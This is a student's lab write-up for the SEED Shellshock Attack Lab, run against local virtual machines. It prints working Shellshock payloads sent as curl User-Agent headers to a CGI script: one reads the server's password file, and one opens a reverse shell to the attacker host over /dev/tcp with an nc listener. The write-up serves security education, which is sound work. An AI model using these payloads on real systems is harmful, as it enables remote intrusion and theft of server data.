| title | Shellshock Attack Lab |
|---|---|
| author | Xinyi Li |
| date | \today{} |
Instruction: https://seedsecuritylabs.org/Labs_16.04/PDF/Shellshock.pdf
Use the following commands to define a shell function, export it into the environment, and then observe if it prints 'extra' when calling the child shell with /bin/bash_shellshock or /bin/bash.
$ foo='() { echo "hello world"; }; echo "extra";'
$ export $fooAs expected, using /bin/bash_shellshock leads to extra print out while it is clear in /bin/bash.
$ su
$ cp myprog.cgi /usr/lib/cgi-bin
$ sudo chmod 755 /usr/lib/cgi-bin/myprog.cgiThe Apache creates a child process to execute bash_shellshock with function exec(), and $$ will be replaced by bash_shellshock with the ID of the current process. So strings /proc/$$/environ will be correctly executed while parsing the HTTP request.
For instance, I can steal passwords of the server using
$ curl -A "() { echo hello;}; echo Content-type: text/plain; echo; /bin/cat /etc/password;" http://localhost/cgi-bin/myprog.cgiHowever, because /etc/shadow is only readable to root, I cannot steal the content of the file unless the webserver is launched by root.
- The attacker:
10.0.2.15 - The server:
10.0.2.4
First, build a TCP connection:
$ nc -lv 9090It is blocked with listening on the port 9090 and print the information of whatever it fetches. Just keep the shell running and finish the following command in another shell
Then start a new shell and make use of the shellshock to map the server's stdin/stdout to local shell.
$ curl -A "() { echo hello;}; echo Content-type: text/plain; echo; echo; /bin/bash -i -> /dev/tcp/10.0.2.15/9090 0<&1 2>&1" http://10.0.2.4/cgi-bin/myprog.cgiSo, a reverse shell is created.
Reproduction of Test 3 is successful while the ones of the other two tasks fail.
Because the output of environment variables is done directly by the bash itself rather than passing to any caller. The behavior will not be influenced by the version of the shell.